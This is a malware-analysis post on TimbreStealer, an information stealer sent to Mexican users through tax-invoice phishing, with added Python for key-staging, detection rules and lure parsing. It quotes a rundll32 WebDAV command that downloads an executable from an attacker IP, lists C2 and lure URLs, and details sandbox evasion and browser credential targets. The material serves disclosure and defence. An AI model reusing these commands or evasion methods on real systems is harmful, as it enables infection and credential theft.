TimbreStealer campaign targets Mexican users with financial lures

  • Cisco Talos has discovered a new campaign operated by a threat actor distributing a previously unknown malware we’re calling “TimbreStealer.”
  • This threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related themes starting in at least November 2023. The threat actor has previously used similar tactics, techniques and procedures (TTPs) to distribute a banking trojan known as “Mispadu.”
  • TimbreStealer is a new obfuscated information stealer found targeting victims in Mexico.
  • It contains several embedded modules used for orchestration, decryption and protection of the malware binary.

Talos has observed an ongoing phishing spam campaign targeting potential victims in Mexico, luring users to download a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least November 2023. This campaign uses phishing emails with financial themes, directing users to a compromised website where the payload is hosted and tricking them into executing the malicious application.

Talos has observed new distribution campaigns being conducted by this threat actor since at least September 2023, when they were initially distributing a variant of the Mispadu banking trojan using geofenced WebDAV servers before changing the payload to this new information-stealer. After the threat actor changed to this new stealer, we haven’t found any evidence of Mispadu being used anymore.

The phishing campaign uses geofencing techniques to target only users in Mexico; any attempt to reach the payload sites from other locations returns a blank PDF file instead of the malicious file. The current spam run was observed to mainly use Mexico’s digital tax receipt standard, CFDI (“Comprobante Fiscal Digital por Internet,” or online digital tax invoice in English). Talos has also observed emails using generic invoice themes in the same campaign.

Although we could not find hard evidence linking the two campaigns, we assess with high confidence they are operated by the same threat actor, based on the same TTPs observed in this campaign and the previous activity distributing Mispadu, and the fact that once TimbreStealer started being distributed, we could not find any more evidence of Mispadu being used. 

TimbreStealer, a new obfuscated information stealer

Talos has identified a new family of information stealers while investigating a spam campaign targeting Mexican users starting in November 2023. The name TimbreStealer is a reference to one of the themes used in the spam campaign which we will analyze later.

TimbreStealer exhibits a sophisticated array of techniques to circumvent detection, engage in stealthy execution, and ensure its persistence within compromised systems. This includes leveraging direct system calls to bypass conventional API monitoring, employing the Heaven’s Gate technique to execute 64-bit code within a 32-bit process, and utilizing custom loaders. These features indicate a high level of sophistication, suggesting that the authors are skilled and have developed these components in-house.

Snippet of code showing how Heaven’s Gate 64-bit switch is executed

The sample we’re analyzing was found on a victim machine following a visit to a compromised website, after the user clicked on a link present in a spam email.

Sample used during this blog analysis

Our analysis identified several modules embedded in the malware’s “.data” section, and a complex decryption process involving a main orchestration DLL and a global decryption key which is used throughout the different modules and updated at each stage. While this analysis is not yet complete, we wanted to describe at least the initial modules and their relationship.

TimbreStealer’s Decryption Process 

This first layer executable is packed and includes an embedded DLL in its “.data” section. The loader will first scan Ntdll for all of the Zw* exports and build an ordered hash table of the functions. All sensitive APIs from this point will be called with direct system calls into the kernel. For 64-bit machines, this will include a transition from 32-bit to 64-bit mode through Heaven’s Gate before the syscall is issued. 

Snippet of code showing the two different methods used by TimbreStealer to execute system calls and hide API usage.

Once this is complete, it will then decrypt the next stage payload from the .data section. The decrypted DLL has its MZ header and PE signature wiped, a technique we will see throughout this malware. A custom PE loader now launches the DLL passing the Zw* hash table as an argument to its exported function. 

Decryption of all submodules makes use of a global decryption key. As the execution of the malware progresses, this key is encrypted over and over again. If execution does not follow every step of the expected path, the decryption key will get out of sync and all subsequent decryptions will fail. 

This prevents reverse engineers from short-cutting the logic to force decryptions or statically extracting arguments to access the payloads. This means every anti-analysis check has to be located and circumvented. Encryption rounds on the global key are scattered about in the code and even occur from within the different sub-modules themselves.
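The staged-key design is easiest to see in miniature. The following Python is an added example, not code from the Talos post or from TimbreStealer: it models a container of CRC32-checked, optionally Zlib-compressed blobs that are all decrypted with one global key, and re-encrypts that key at every stage transition. The XOR cipher, the SHA-256 key schedule, the stage tags and the sample module contents are assumptions chosen for the illustration; the post does not disclose the malware’s actual algorithms.

```python
import hashlib
import zlib
from dataclasses import dataclass


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: a stand-in cipher, symmetric so one function serves both ways."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


@dataclass
class Blob:
    idx: int
    crc32: int        # Zlib CRC32 of the decrypted (and decompressed) module
    compressed: bool  # decompress after decryption, like the '*' rows in the tables
    data: bytes       # encrypted payload as stored in the container


class StagedKey:
    """The global decrypt key.  Every stage transition (and, in the real
    sample, scattered anti-analysis checks) re-encrypts it in place."""

    def __init__(self, seed: bytes):
        self.key = seed

    def advance(self, stage_tag: bytes) -> None:
        # Stand-in for the malware's undisclosed key round (assumption):
        # hash the current key together with a per-stage tag.
        self.key = hashlib.sha256(self.key + stage_tag).digest()


def open_blob(blob: Blob, key: StagedKey) -> bytes:
    """Parent loader: decrypt, optionally decompress, then verify CRC32."""
    plain = xor_bytes(blob.data, key.key)
    if blob.compressed:
        try:
            plain = zlib.decompress(plain)
        except zlib.error as exc:
            raise ValueError(f"blob {blob.idx}: decompression failed") from exc
    if zlib.crc32(plain) != blob.crc32:
        raise ValueError(f"blob {blob.idx}: CRC32 mismatch (key out of sync?)")
    return plain


def build_container(modules: list, seed: bytes, stage_tags: list) -> list:
    """Encrypt each module with the key state its stage will be in."""
    key = StagedKey(seed)
    blobs = []
    for idx, (plain, compressed) in enumerate(modules):
        key.advance(stage_tags[idx])
        payload = zlib.compress(plain) if compressed else plain
        blobs.append(Blob(idx, zlib.crc32(plain), compressed,
                          xor_bytes(payload, key.key)))
    return blobs


# Constructed sample modules and stage tags (not the malware's).
MODULES = [(b"shellcode loader", False),
           (b"anti-analysis DLL", False),
           (b"installer with encrypted payload" * 8, True)]
STAGE_TAGS = [b"stage0", b"stage1", b"stage2"]
SEED = b"\x13\x37" * 16


def unpack_in_order() -> list:
    """The intended path: every stage advances the key before its blob."""
    key = StagedKey(SEED)
    out = []
    for blob in build_container(MODULES, SEED, STAGE_TAGS):
        key.advance(STAGE_TAGS[blob.idx])
        out.append(open_blob(blob, key))
    return out


def unpack_skipping_stage(skipped: int) -> str:
    """The analyst's shortcut: jump over one stage's key round.  Returns
    'ok' or the error raised by the first blob that no longer decrypts."""
    key = StagedKey(SEED)
    try:
        for blob in build_container(MODULES, SEED, STAGE_TAGS):
            if blob.idx != skipped:
                key.advance(STAGE_TAGS[blob.idx])
            open_blob(blob, key)
    except ValueError as exc:
        return str(exc)
    return "ok"


if __name__ == "__main__":
    print([m[:16] for m in unpack_in_order()])
    print(unpack_skipping_stage(1))
```

Skipping a stage (the shortcut a reverse engineer takes by jumping over an anti-analysis check) leaves the key one round behind, so the next blob fails its CRC32 check rather than decrypting; the only way forward is to execute, or faithfully emulate, every key round in order.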

All stages of this malware use the same coding style and techniques. We therefore assess with high confidence that all obfuscation layers and final payload were developed by the same authors.

TimbreStealer’s embedded modules

Once the initial layer is extracted, TimbreStealer will check if the system is of interest and whether or not it’s being executed in a sandbox environment. It will also extract the many submodules embedded in the payload. Talos identified at least three different layers after the main payload was extracted, with several modules in each layer used for different functions:

TimbreStealer campaign targets Mexican users with financial lures
Diagram showing the different module relationships in TimbreStealer.

The second stage of the malware is the orchestrator layer, which is responsible for detecting systems of interest and extracting all subsequent modules. To determine if the system is of interest to the attackers, the malware first checks that the system language is not Russian, and then checks the timezone to ensure it is within a Latin American region. This is followed by CsrGetProcessId debugger checks and counting desktop child windows to ensure it is not running in a sandbox environment.

At this stage the malware will also do a mutex check, look for files and registry keys that may be indicative of previous infection, and scan the system browsers for signs of natural use. The files and registry keys checked by the malware include the non-exhaustive list below:

  • HKLM\SOFTWARE\Microsoft\CTF\TIP\{82AA36AD-864A-2E47-2E76-9DED47AFCDEB}
    • {A0E67513-FF6B-419F-B92F-45EE8E03AEEE} = <value>
    • {E77BA8A1-71A1-C475-4F73-8C78F188ACA7} = <value>
    • {DB2D2D69-9EE0-9A3C-2924-67021A31F870} = <value>
    • {6EF3E193-61BF-4F68-9736-51CF6905709D} = <value>
    • {3F80FA11-1693-4D05-AA83-D072E69B77FC} = <value>
    • {419EEE13-5039-4FA4-942A-ADAE5D4ED5C3} = <value>
  • C:\Windows\Installer\{E1284A06-8DFA-48D4-A747-28ECD07A2966}
  • Global\I4X1R6WOG6LC7APSPY1YAXZWJGK70AZARZEGFT3U

The presence of these keys along with other checks mentioned before will prevent the execution of the remaining stages of the malware.

The orchestrator contains four other encrypted sub-modules within it.

IDX | Size   | CRC32      | Purpose
0   | 8kb    | 0xF25BEB22 | Shellcode loader for stripped DLLs
1   | 100kb  | 0xEB4CD3EC | DLL – not analyzed yet
2   | 60kb   | 0xFA4AA96B | DLL – anti-VM and anti-analysis, system-of-interest checks
3   | 3.92mb | 0xAB029A74 | DLL – installer with encrypted payload

All blobs are accessed through a parent loader function which verifies the expected Zlib CRC32 hash of data and can optionally decompress the raw data if specified. This overall architecture has been observed in all layers.

Each stripped DLL is loaded by a custom shellcode loader from submodule #0 (IDX = 0). Execution is transferred to this shellcode through a Heaven’s Gate stub using the ZwCreateThreadEx API.

Snippet of code showing how TimbreStealer executes the embedded shellcode modules

Submodule No. 2 is an anti-analysis DLL that performs several checks and does scattered rounds of encryption on the global decrypt buffer. If any check fails, the installer module will not decrypt properly. Checks in this layer include:

  • VMWare hook and port checks.
  • Vpcext, IceBP, int 2D instructions to detect debuggers.
  • Checking physical drive for strings: qemu, virtual, vmware, vbox, xensrc, sandbox, geswall, bufferzone, safespace, virtio, harddisk_ata_device, disk_scsi_disk_device, disk_0_scsi_disk_device, nvme_card_pd, google_persistentdisk.

If all of these checks complete as expected, then the final module can be decrypted successfully. 

Submodule No. 3 is the installer layer, which will drop several files to disk and trigger execution. A benign decoy document will also be displayed to help defer suspicion. 

Files dropped by the payload installer module after machine of interest checks passed

Execution is triggered by registering a task through the ITaskService COM interface. The scheduled task uses Microsoft’s reg.exe to add a run once registry key, and then triggers rundll32.exe to process this entry through the system iernonce.dll.

Scheduled Task configuration to run the installed DLL

Under certain conditions, this layer can also modify Group Policy options to set startup scripts.
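The persistence chain above (scheduled task, reg.exe writing a run once key, rundll32.exe loading iernonce.dll) is a good candidate for process-creation telemetry. The Python below is an added example, not code from the Talos post: it runs three rules over constructed process-creation events, and also covers the rundll32.exe/davclnt.dll DavSetCookie command line the post shows later in the Mispadu section. The event schema (parent, image, cmdline) is an assumed EDR/Sysmon-style shape; the RunOnceEx key path, the value name and the RunOnceExProcess export in the sample lines are constructed for this example, since the post only states that a run once key is added and that rundll32.exe processes it through iernonce.dll.

```python
import re


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_webdav_fetch(e: dict) -> bool:
    """rundll32 davclnt.dll,DavSetCookie <host>@80 <url>: a WebDAV fetch of
    a remote file, the .url-file trick both campaigns use for delivery."""
    cmd = e["cmdline"].lower()
    return (_basename(e["image"]) == "rundll32.exe"
            and "davsetcookie" in cmd
            and re.search(r"\S+@80(?:\s|$)", cmd) is not None)


def rule_runonce_via_reg(e: dict) -> bool:
    """reg.exe add ...\\RunOnce(Ex)...: an autostart entry written with the
    console tool rather than by an installer."""
    cmd = e["cmdline"].lower()
    return (_basename(e["image"]) == "reg.exe"
            and re.search(r"\badd\b", cmd) is not None
            and "\\runonce" in cmd)


def rule_rundll32_iernonce(e: dict) -> bool:
    """rundll32 iernonce.dll: the system DLL that processes run once
    entries, invoked directly instead of waiting for the logon sequence."""
    return (_basename(e["image"]) == "rundll32.exe"
            and "iernonce.dll" in e["cmdline"].lower())


RULES = {
    "webdav_remote_fetch": rule_webdav_fetch,
    "runonce_via_reg": rule_runonce_via_reg,
    "rundll32_iernonce": rule_rundll32_iernonce,
}


def detect(events: list) -> list:
    """Return (event index, rule name, severity).  Children of svchost.exe
    are rated high: that is how a Task Scheduler action is spawned, which
    is the trigger the post describes."""
    hits = []
    for i, e in enumerate(events):
        parent_is_svchost = _basename(e["parent"]) == "svchost.exe"
        for name, rule in RULES.items():
            if rule(e):
                hits.append((i, name, "high" if parent_is_svchost else "medium"))
    return hits


# Constructed sample events (assumed schema); 192.0.2.10 is a documentation
# address, and the RunOnceEx key/value and DLL export are invented for the example.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": '"chrome.exe" --profile-directory=Default'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie "
                r"192.0.2.10@80 http://192.0.2.10/formato23/9577710738/1242144429.exe"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001 "
                r"/v Load /t REG_SZ /d Cecujujajofubo475.dll /f"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe iernonce.dll,RunOnceExProcess"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"},
]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The rules are deliberately narrow on the image name and the distinctive command-line tokens (DavSetCookie with an @80 host, reg.exe add against a RunOnce key, rundll32 loading iernonce.dll) so that ordinary rundll32.exe and reg.exe usage, as in the last two sample events, does not fire.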

TimbreStealer’s Installed DLL modules

The installed DLL, named Cecujujajofubo475.dll, uses the same overall architecture as the first DLL detailed above: all of its internal strings are encrypted, it uses a global decrypt buffer, and it uses a different Zw* API hash table to perform direct syscalls that avoid the user-mode API.

In this layer there are also TLS callbacks that add complexity to the global decrypt buffer encryption. An extra round of encryption has been added that depends on the parent process name and on the value within the registry key given above, to prevent analysis on third-party machines.

This DLL contains eight encrypted sub-modules within it:

IDX | Size     | CRC32      | Purpose
0   | 0x1000   | 0x2B80E901 | Single XOR function accepting 5 arguments
1   | 0x1000   | 0x520200E8 | x64 shellcode PE loader
2   | 0x2000   | 0x105542F7 | x86 shellcode PE loader
3   | 0x2000   | 0xC4ECE0A8 | Unknown shellcode
4   | 0x7600   | 0xC1384E15 | Unknown module, seems to be used to decompress other blobs
5   | 0xD800*  | 0x1D38B250 | Anti-VM/sandbox layer
6   | 0x1B600* | 0x4F1FEFE3 | x86 DLL to extract main payload
7   | 0x1EE00* | 0xF527AC18 | x64 DLL to extract main payload

(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.

While this DLL contains many of the same protections found in the installation phase, several more have been identified in this layer. The first is a patch to the ZwTraceEvent API to disable user mode Event Tracing for Windows data collection. 

Another interesting protection overwrites all of the DLLs loaded in the process with clean copies read from disk. This wipes every antivirus vendor user-mode hook, software breakpoint and user patch present at the time of execution.

This DLL serves as a loader for the final payload, which is housed within the ApplicationIcon.ico file shown in the previous relationship diagram. Submodule No. 7 is the default loader that this DLL attempts to launch: it tries to inject this 64-bit DLL into a preferred list of svchost.exe processes.

The order of preference is based on svchost.exe process command line, looking for the following strings: 
  • DcomLaunch
  • Power
  • BrokerInfrastructure
  • LSM
  • Schedule

If the injections into svchost.exe fail, then a backup 32-bit fallback shellcode is also available. In this mode a two-stage shellcode is loaded from sub-module No. 6 and execution is transferred to it. A new thread is created using syscalls with a modified context, and then ResumeThread triggers its execution. All memory allocations for the shellcode are also executed through the syscall mechanism set up earlier. 

The first stage of the shellcode will decrypt its second stage, and then extract and decrypt the final payload DLL from the ApplicationIcon.ico file. The 32 bit version will again use a custom PE loader to directly load and run the final payload DLL within its own process after extraction.

TimbreStealer’s Final Payload Module

The architecture of this layer is the same as all of the previous and contains an additional nine sub-modules. Analysis of this final payload module and submodules is still ongoing at the time of writing:

IDX | Size      | CRC32      | Purpose
0   | 0x1000    | 0x2B80E901 | Single XOR function accepting 5 arguments; matches the previous layer’s blob #0
1   | 0x1000    | 0x520200E8 | x64 shellcode PE loader; matches the previous layer’s blob #1
2   | 0x2000    | 0x105542F7 | x86 shellcode PE loader; matches the previous layer’s blob #2
3   | 0x2000    | 0xC4ECE0A8 | Unknown shellcode; matches the previous layer’s blob #3
4   | 0xA5000*  | 0xB0214A74 | Not yet analyzed
5   | 0x13CC00* | 0xE8421ADE | Not yet analyzed
6   | 0x16800*  | 0xD30A298E | Not yet analyzed
14  | 0x16600*  | 0x55BFB99  | Not yet analyzed
15  | 0x7C800*  | 0x2F6F928D | Not yet analyzed

(*) indicates the blob is decompressed after decryption. The column shows the decompressed size.

The following is a preliminary analysis of the malware features based on the strings we were able to decrypt from this module. They indicate the malware can collect a variety of information from the machine and post data to an external website, which is typical behavior of an information stealer.

Collect credential information from the victim’s machine

The following strings were found in functions scanning files and directories. This module also embeds the SQLite library to handle different browsers’ credential storage files.

  • CloudManagementEnrollmentToken
  • Google\\Chrome Beta\\User Data
  • Google\\Chrome Dev\\User Data
  • Google\\Chrome SxS\\User Data
  • Google\\Chrome\\User Data
  • Google\\Policies
  • Microsoft\\Edge Beta\\User Data
  • Microsoft\\Edge Dev\\User Data
  • Microsoft\\Edge\\User Data
  • Software\\Google\\Chrome
  • Software\\Google\\Chrome\\Enrollment
  • Software\\Google\\Enrollment
  • Software\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}
  • SOFTWARE\\Microsoft\\Cryptography
  • Software\\Policies\\Google\\Chrome
  • Software\\Policies\\Google\\Update
  • history
  • feeds
  • feeds cache
  • internet explorer
  • media player
  • office
  • OneDrive
  • packages 
  • Skydrive
  • Formhistory.sqlite
  • SELECT count(`place_id`) FROM `moz_historyvisits` WHERE `place_id` = %I64u;
  • SELECT `id`, `url`, `visit_count` FROM `moz_places` WHERE `last_visit_date`
  • Mozilla\\Firefox\\Profiles\\
  • Thunderbird\\Profiles\\
  • Postbox\\Profiles\\
  • PostboxApp\\Profiles\\
  • SOFTWARE\\Mozilla\\Mozilla Firefox
  • SOFTWARE\\Mozilla\\Mozilla Thunderbird
  • SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList

Search for Files

The malware also scans several directories looking for files although it’s not clear yet for what purpose. We can see in the list below folders related to AdwCleaner, Avast Scanner as well as 360 Antivirus quarantine folders. 

Another set of interesting strings in this list are “.Spotlight-V100” and “.fseventsd” which are related to MacOS.

  • $360Section
  • $AV_ASW
  • $GetCurrent
  • $Recycle.Bin
  • $SysReset
  • $WinREAgent
  • .fseventsd
  • .Spotlight-V100
  • AdwCleaner
  • AMD
  • Autodesk
  • boot
  • Brother
  • Config.Msi
  • Documents and Settings
  • EFI
  • Hewlett-Packard
  • inetpub
  • Intel
  • MSOCache
  • PerfLogs
  • Program Files
  • Program Files (x86)
  • ProgramData
  • Recovery
  • RecoveryImage
  • Resources
  • SWSetup
  • System Volume Information
  • SYSTEM.SAV
  • ~MSSETUP.T
  • $WINDOWS.
  • AutoKMS
  • KMSAuto
  • Users
  • AppData\\Local
  • AppData\\Roaming
  • Desktop
  • Documents
  • Downloads
  • OneDrive
  • Dropbox

Collect OS information

TimbreStealer uses the Windows Management Instrumentation (WMI) interface and registry keys to collect a wealth of information about the machine where it’s running.

  • OS Information: Description, IdentifyingNumber, Manufacturer, Name, Product, ReleaseDate, InstallDate, InstallTime
  • SMB BIOS information: SMBIOSBIOSVersion, SMBIOSMajorVersion, SMBIOSMinorVersion, SerialNumber, Vendor, Version
  • Hardware information: Win32_ComputerSystemProduct, Win32_BaseBoard, Win32_Bios, Win32_PhysicalMemory
  • Network Domain Information: StandaloneWorkstation, MemberWorkstation, StandaloneServer, MemberServer, BackupDomainController, PrimaryDomainController
  • Application information: DisplayName, Publisher, DisplayVersion, OSArchitecture

Search for file extensions

The code also looks for a specific list of file extensions. Note that the extension “.zuhpgmcf” below is not associated with any known file type. This may be indicative of a file that is created by the malware itself.

  • .bak, .fbk, .dat, .db, .cmp, .dbf, .fdb, .mdf, .txt, .cer, .ods, .xls, .xlsx, .xml, .zuhpgmcf

Look for URLs Accessed

The strings below represent URLs of interest to the malware. It also contains mentions of a virtual device used to capture network packets, which may be indicative that the malware can do network sniffing.

  • npf
  • npcap
  • npcap_wifi
  • www.google.com
  • amazon.com
  • dropbox.com
  • linkedin.com
  • twitter.com
  • wikipedia.org
  • facebook.com
  • login.live.com
  • apple.com
  • www.paypal.com

Disable System Protections

The malware calls a function used to remove System Restore points on the machine. This is typical ransomware behavior, although Talos has not observed any ransomware activity on infected victims. Additional analysis is still needed to confirm or discard this hypothesis.

  • SELECT * FROM SystemRestore
  • SequenceNumber
  • SrClient.dll
  • SRRemoveRestorePoint
  • SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Power
  • HiberbootEnabled

Look for Remote Desktop Software

The malware attempts to access the service and the named synchronization objects used by Remote Desktop servers. It’s not yet clear how this is used in the payload code.

  • console
  • TermService
  • Global\\TermSrvReadyEvent
  • winlogon.exe
  • console

POST data to remote site

A list of URLs along with strings used in HTTP communication was found in functions accessing the network. These URLs don’t conform to the format of other URLs used in the distribution of TimbreStealer. We believe these to be the command and control servers used by the malware, but so far, the samples we analyzed have not communicated back to any of them.

  • POST
  • PUT
  • Content-Disposition: form-data; name=”
  • “; filename=”
  • “\\r\\nContent-Type: application/octet-stream\\r\\n
  • Content-Type: multipart/form-data; boundary=
  • Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  • Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
  • HTTP/1.1 200 OK\\r\\nDate: %s %s GMT\\r\\nConnection: Close\\r\\nAccess-Control-Allow-Origin: *\\r\\nAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept\\r\\nContent-Type: text/plain;charset=UTF-8\\r\\n\\r\\n
  • https://hamster69[.]senac2021[.]org/~armadillo492370/
  • https://snapdragon50[.]crimsondragonemperor[.]com/~aster963249/
  • https://69[.]64[.]35[.]1/~route649289/

These strings are just a small piece of this puzzle, and more analysis is required on the final payload and its embedded modules to understand their exact purpose.

Previous Mispadu spam campaign

Activity associated with these current distribution campaigns was first observed in September 2023 when the threat group was distributing a variant of the Mispadu information stealer. This campaign was using compromised websites to distribute a Zip archive containing a “.url” file which used a WebDAV file path to execute an externally hosted file upon the victim double clicking on it.

Internet shortcut (.url) file used in the Mispadu campaign.

Both URLs are remote UNC paths and use a port specification of “@80” to force the connection to occur via WebDAV. This connection is performed by Rundll32.exe with the parameters shown in the example below:

  • rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 159[.]89[.]50[.]225@80 http://159[.]89[.]50[.]225/formato23/9577710738/1242144429.exe 

During the campaign, all WebDAV servers were geofenced to allow connections only from IP addresses located in Mexico.

The .url files were named in multiple ways but almost always contained “RFC,” a reference to the Registro Federal de Contribuyentes (Federal Taxpayers Registry), suggesting the lure was financially related. The .url file names also typically contained 6 random digits. 

The Mispadu payload contained a hardcoded C2 address which used HTTPS as communication protocol. We have seen a variety of C2 URLs, changing up over time but keeping a similar pattern pointing to “it.php” with two parameters “f” and “w”: 

  • hxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2&w=Windows%2010
  • hxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9&w=Windows%2010
  • hxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2&w=Windows%2010
  • hxxps://manderlyx[.]com/cruto/it.php?f=2&w=Windows%2010
  • hxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2&w=Windows%2010

We observed this campaign to be active until the middle of November, at which time a new payload with TimbreStealer was dropped on the victim’s computers from the compromised website.

The target industries of this campaign are spread across different verticals, with a slight focus on manufacturing and transportation, as shown below:

Graph showing the most targeted industries in the Mispadu campaign.

Spam campaign using CFDI as lure

Talos detected a low-volume campaign using CFDI to lure users into downloading and executing a malicious file disguised as a PDF document, starting around the middle of November and still ongoing as of February 2024. CFDI is a mandatory electronic invoice standard used in Mexico for tax reporting. In this campaign, a spam email was used as the lure to redirect users to a malicious web page hosted on compromised websites.

Example of a spam email distributing the new TimbreStealer malware

The Subjects we observed in this campaign follow the same theme:

  • Recibió un Comprobante Fiscal Digital (CFDI). Folio Fiscal: fcd7bf2f-e800-4ab3-b2b8-e47eb6bbff8c
  • Recibió una Factura. Folio Fiscal: 050e4105-799f-4d17-a55d-60d1f9275288

The website uses Javascript to detect characteristics of the user such as geolocation and browser type and then initiates the download of a Zip file containing a .url file, which in turn will download the initial TimbreStealer dropper using WebDAV. The Zip file is usually named following the same theme:

  • CFDI_930209.zip
  • FACTURA_560208.zip

In case the access does not come from Mexico, a blank PDF is served instead of the malicious payload.

Message displayed after the user visits the site where the initial dropper malware is downloaded.

All the URLs for this current campaign follow a similar format:

  • hxxps://<some>.<compromised>[.]<web>/<token>/<14_char_hex_id>

Where <token> above is one of the following strings: “cfdi”, “factura”, “timbreDigital”,  “facdigital” or “seg_factura”. The first part of the domain is also a random Spanish word related to digital invoices followed by two numbers.

  • hxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977
  • hxxps://suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508
  • hxxps://suscripcion65[.]g1ooseradas[.]buzz/factura/9f03d9ef3d73b5
  • hxxps://timbrado11[.]verificatutramite[.]com/facdigital/f7640878ebc0f9

The .url file this time contains more obfuscation intended to make detection by Antivirus products more difficult, yet it still uses WebDAV via HTTP to download the malicious file and an icon representing a PDF file:

Internet shortcut (.url) file used in the TimbreStealer campaign

User interaction is required to open the downloaded Zip file and double-click on the .url file for the malware to execute, at which point the TimbreStealer main infection will start.
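As an added example (not the post’s or the campaign’s code), the Python below parses a .url file leniently, flags any URL= or IconFile= target that is a UNC or file:// path with a host@80 port suffix (the WebDAV trick both the Mispadu and the TimbreStealer .url files rely on), and matches URLs and archive names against the lure patterns quoted above. The sample .url content is constructed for the example with a documentation address (192.0.2.10) and the path layout from the Mispadu DavSetCookie command; the lure URLs checked in the test are the ones listed in the post.

```python
import re

# '\\host@80\share' or 'file://host@80/path': the @port suffix makes the
# Windows redirector fetch the target over WebDAV instead of SMB.
WEBDAV_AT_PORT = re.compile(
    r"(?:\\\\|file://)(?P<host>[^\\/@\s]+)@(?P<port>\d{1,5})[\\/]", re.I)

# hxxps://<spanish word><2 digits>.<compromised domain>/<token>/<14 hex chars>
LURE_URL = re.compile(
    r"^https?://(?P<sub>[a-z]+\d{1,2})\.(?P<domain>[a-z0-9.-]+)/"
    r"(?P<token>cfdi|factura|timbreDigital|facdigital|seg_factura)/"
    r"(?P<id>[0-9a-f]{14})$", re.I)

# CFDI_930209.zip / FACTURA_560208.zip
LURE_ZIP = re.compile(r"^(?:CFDI|FACTURA)_\d{6}\.zip$", re.I)


def refang(s: str) -> str:
    """Undo hxxp(s):// and [.] defanging so the patterns can match."""
    return re.sub(r"^hxxp", "http", s.strip(), flags=re.I).replace("[.]", ".")


def parse_url_file(text: str) -> dict:
    """Lenient INI parse of a .url file: BOM and whitespace tolerant,
    keys lower-cased, last duplicate key wins."""
    fields = {}
    for line in text.lstrip("\ufeff").splitlines():
        line = line.strip()
        if not line or line[0] in "[;#" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key.strip().lower()] = value.strip()
    return fields


def webdav_targets(fields: dict) -> list:
    """(key, host, port) for every field whose value is a host@port path."""
    hits = []
    for key, value in fields.items():
        m = WEBDAV_AT_PORT.search(value)
        if m:
            hits.append((key, m.group("host"), int(m.group("port"))))
    return hits


def is_suspicious_url_file(text: str) -> bool:
    """A shortcut that fetches its target or its icon over WebDAV on port 80."""
    return any(port == 80 for _, _, port in webdav_targets(parse_url_file(text)))


def classify_lure(name_or_url: str) -> str:
    """'url' or 'zip' when the string fits a campaign pattern, else ''."""
    s = refang(name_or_url)
    if LURE_URL.match(s):
        return "url"
    if LURE_ZIP.match(s):
        return "zip"
    return ""


# Constructed sample shortcut (not a real campaign artifact); the icon is
# also fetched over WebDAV, as the post describes for the TimbreStealer .url.
SAMPLE_URL_FILE = (
    "\ufeff[InternetShortcut]\r\n"
    "URL=file://192.0.2.10@80/formato23/9577710738/1242144429.exe\r\n"
    "IconFile=\\\\192.0.2.10@80\\formato23\\pdf.ico\r\n"
    "IconIndex=0\r\n"
)


if __name__ == "__main__":
    print(webdav_targets(parse_url_file(SAMPLE_URL_FILE)))
    print(classify_lure("hxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977"))
```

The parser deliberately ignores section headers and unknown keys rather than rejecting them, so padding or junk lines added for obfuscation do not hide the one field that matters: a target host carrying an @port suffix.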

ATT&CK TTPs Used in TimbreStealer Campaign

ATT&CK ID | Description
T1566.002 | Spearphishing Link
T1566.001 | Spearphishing Attachment
T1204.002 | Malicious File
T1105     | Ingress Tool Transfer
T1190     | Exploit Public-Facing Application
T1071.001 | Web Protocols
T1036.005 | Masquerading: Match Legitimate Name or Location
T1483     | Domain Generation Algorithms
T1071     | Application Layer Protocol
T1027.009 | Obfuscated Files or Information: Embedded Payloads
T1027.010 | Obfuscated Files or Information: Command Obfuscation
T1027.002 | Obfuscated Files or Information: Software Packing
T1564.001 | Hide Artifacts: Hidden Files and Directories
T1497.003 | Virtualization/Sandbox Evasion: Time Based Evasion
T1497.001 | Virtualization/Sandbox Evasion: System Checks
T1497.002 | Virtualization/Sandbox Evasion: User Activity Based Checks
T1055.002 | Process Injection: Portable Executable Injection
T1055.001 | Process Injection: Dynamic-link Library Injection
T1055.012 | Process Injection: Process Hollowing
T1140     | Deobfuscate/Decode Files or Information
T1574.002 | Hijack Execution Flow: DLL Side-Loading
T1082     | System Information Discovery
T1486     | Data Encrypted for Impact
T1070.001 | Indicator Removal: Clear Windows Event Logs
